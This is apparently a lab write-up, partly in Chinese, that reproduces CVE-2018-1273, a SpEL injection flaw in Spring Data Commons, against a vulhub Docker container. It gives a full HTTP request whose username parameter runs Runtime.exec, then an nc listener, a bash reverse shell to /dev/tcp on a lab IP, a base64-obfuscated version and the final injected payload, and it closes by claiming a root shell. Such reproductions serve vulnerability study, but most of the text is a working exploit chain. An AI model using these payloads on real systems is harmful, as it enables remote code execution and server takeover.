Spring Data Commons Remote Command Execution Vulnerability_CVE-2018-1273 (Desequence Runtime Method)

SpringDataCommons remote command execution vulnerability_CVE-2018-1273 (Desequence Runtime method)

[poc]

1 Interpretation of online vulnerabilities:

https://vulhub.org/#/environments/spring/CVE-2018-1273/

Spring Data Commons 在2.0.5及以前版本中，存在SpEL表达式注入漏洞

2 Environment setup

cd  /home/kali/vulhub/spring/CVE-2018-1273

2.1 Startup:

sudo docker-compose up -d

sudo docker-compose ps -a
sudo docker ps -a

2.2 Started: access port 8098

3 affected versions:

​ ​ Spring Data Commons <= version 2.0.5

4 Vulnerability recurrence

4 Vulnerability recurrence

4.1 Access page

​ Visit pagehttp://192.168.225.166:8098/users

4.2 bp packet capture, modify parameters

4.2.1 The Payload in the link is captured and forwarded to the repeater during registration, and modified into the following data packet:

POST /users?page=&size=5 HTTP/1.1
Host: 192.168.225.166:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
Origin: http://192.168.225.166:8098
Connection: close
Referer: http://192.168.225.166:8098/users
Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

4.2.2 Core instructions, send, class deserialization

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

4.2.3 Check the docker container to see that the file has been created and there is a vulnerability

sudo docker ps -a
sudo docker exec -it d63fc660cd63  /bin/bash

5 exploits

5.1 Build a rebound shell

nc   -lvp  6666   # l是监听模式；v是显示详细信息；p是指定端口；

bash -i &> /dev/tcp/192.168.225.166/6666 0<&1  # 反弹交互指令tcp服务

=============解释==================
bash -c {echo,base64编码一句话shell}|{base64,-d}|{bash,-i}

==============最终组合=================
# https://ares-x.com/tools/runtime-exec/转换
bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPCYx}|{base64,-d}|{bash,-i}

5.2 Core POC utilization

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPCYx}|{base64,-d}|{bash,-i}")]=&password=&repeatedPassword=

5.3 Successfully rebound the shell and obtain root